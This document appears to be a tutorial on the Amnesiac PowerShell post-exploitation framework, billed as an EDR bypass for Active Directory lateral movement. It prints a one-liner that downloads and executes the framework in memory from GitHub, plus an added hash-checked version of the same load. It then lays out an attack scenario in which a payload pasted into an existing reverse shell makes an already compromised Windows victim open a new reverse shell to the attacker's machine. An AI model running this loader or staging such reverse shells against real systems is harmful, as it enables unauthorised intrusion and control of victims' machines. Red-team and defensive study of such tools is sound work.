Amnesiac - EDR Bypass

Introduction

Amnesiac is a post-exploitation framework designed to assist with lateral movement within Active Directory environments.

Amnesiac is being developed to bridge a gap on Windows, where post-exploitation frameworks are not readily available unless explicitly installed. It is written entirely in PowerShell, so it can be loaded and executed in memory like any other PowerShell script. In-memory loading avoids writing a file to disk, but it does not by itself hide the script from PowerShell script block logging (Event ID 4104) or from AMSI: both still see the script text that Invoke-Expression runs.

Load and Run

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Amnesiac/main/Amnesiac.ps1');Amnesiac
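The one-liner above executes whatever the `main` branch URL serves at the moment it is run. The following is an added example, not code from the Amnesiac project: it performs the same in-memory load, but downloads the script into a variable, checks its SHA-256 against a value pinned in advance, and only then invokes it. The helper name Get-BytesSha256 and the placeholder value of $ExpectedSha256 are assumptions for the example; fill the hash in from a reviewed local copy of Amnesiac.ps1.

```powershell
# Added example, not code from the Amnesiac project.
# Same in-memory load as the one-liner, but the downloaded script is only
# executed if its SHA-256 matches a value pinned beforehand.
# $ExpectedSha256 is a placeholder: fill it with the hash of the Amnesiac.ps1
# revision you reviewed (Get-FileHash or sha256sum on a local copy).

$Url            = 'https://raw.githubusercontent.com/Leo4j/Amnesiac/main/Amnesiac.ps1'
$ExpectedSha256 = '<sha256 of the reviewed Amnesiac.ps1 revision>'

function Get-BytesSha256 {
    # Hex SHA-256 of a byte array. Hashing the raw bytes as served keeps the
    # value comparable with Get-FileHash / sha256sum on the same file.
    param([Parameter(Mandatory)][byte[]]$Bytes)
    $sha256 = [System.Security.Cryptography.SHA256]::Create()
    try {
        $hash = $sha256.ComputeHash($Bytes)
        return ([System.BitConverter]::ToString($hash)).Replace('-', '').ToLowerInvariant()
    } finally {
        $sha256.Dispose()
    }
}

# Download into a variable rather than piping straight into iex, so the
# content can be checked (and read, if wanted) before anything executes.
$client = New-Object System.Net.WebClient
$bytes  = $client.DownloadData($Url)
$actual = Get-BytesSha256 -Bytes $bytes

if ($actual -ne $ExpectedSha256.Trim().ToLowerInvariant()) {
    throw "Amnesiac.ps1 hash mismatch: expected $ExpectedSha256, got $actual. Refusing to execute."
}

# Decode as UTF-8, drop a byte-order mark if one is present, then execute
# exactly as the one-liner does: Invoke-Expression runs in the current scope,
# so the functions the script defines are available and the entry point can
# be called directly afterwards.
$scriptText = [System.Text.Encoding]::UTF8.GetString($bytes).TrimStart([char]0xFEFF)
Invoke-Expression $scriptText
Amnesiac
```

The hash check turns a changed upstream script into a hard failure instead of silent execution of code nobody reviewed. It does nothing for detection exposure: the script text still passes through AMSI and script block logging when Invoke-Expression runs it.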

Attack Map

Windows Victim Machine --> Kali Linux (Attacker's Machine)
    [Reverse Shell Connection]

Kali Linux (Attacker's Machine) --> Windows Attack Machine (Amnesiac Server)
    [Generate Listener Payload]

Windows Victim Machine --> Windows Attack Machine (Amnesiac Server)
    [New Reverse Shell Connection]

Attack Scenario

The attack scenario covers a post-exploitation phase:

  1. The attacker already has access to the victim machine, which is a Windows system.

  2. The attacker uses a Kali Linux machine as the primary attack machine, holding the existing reverse shell from the victim.

  3. A second Windows machine is used by the attacker to run Amnesiac and generate a listener payload.

  4. The Amnesiac server runs on this Windows attack machine and generates a listener payload intended for the already compromised victim machine.

  5. The attacker pastes the generated payload into the existing reverse shell session on the Kali Linux machine, so that it executes on the victim.

  6. As a result, the victim machine opens a new reverse shell connection to the Windows attack machine, and the attacker gets a new session in Amnesiac there.

